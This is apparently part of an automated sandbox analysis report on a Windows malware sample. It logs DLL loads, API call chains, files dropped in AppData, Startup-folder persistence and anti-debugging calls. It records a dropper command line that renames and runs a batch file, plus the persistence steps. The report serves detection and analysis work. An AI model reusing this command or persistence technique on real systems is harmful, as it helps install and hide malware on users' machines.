Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cW5i0RdQ4L.exeStatic file information: File size 1086602 > 1048576
Source: cW5i0RdQ4L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E1CBDB push eax; retf 10_2_00E1CBF8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E28B75 push ecx; ret 10_2_00E28B88
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00908B75 push ecx; ret 16_2_00908B88

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifFile created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\103495\Powder.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifFile created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\103495\Powder.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00E859B3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E15EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00E15EDA
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_009659B3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_008F5EDA
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00E233B7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifAPI coverage: 5.0 %
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrAPI coverage: 4.8 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6CD14 FindFirstFileW,FindClose,10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094CD14 FindFirstFileW,FindClose,16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00943CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E15D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00E15D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\103495\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\103495Jump to behavior
Source: Powder.pif, 0000000A.00000002.3572166645.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E745D5 BlockInput,10_2_00E745D5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00E15240
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E35CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00E35CAC
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00E588CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00E2A385
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2A354 SetUnhandledExceptionFilter,10_2_00E2A354
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0090A385
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090A354 SetUnhandledExceptionFilter,16_2_0090A354
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E59369 LogonUserW,10_2_00E59369
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00E15240
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E61AC6 SendInput,keybd_event,10_2_00E61AC6
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E651E2 mouse_event,10_2_00E651E2
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.batJump to behavior
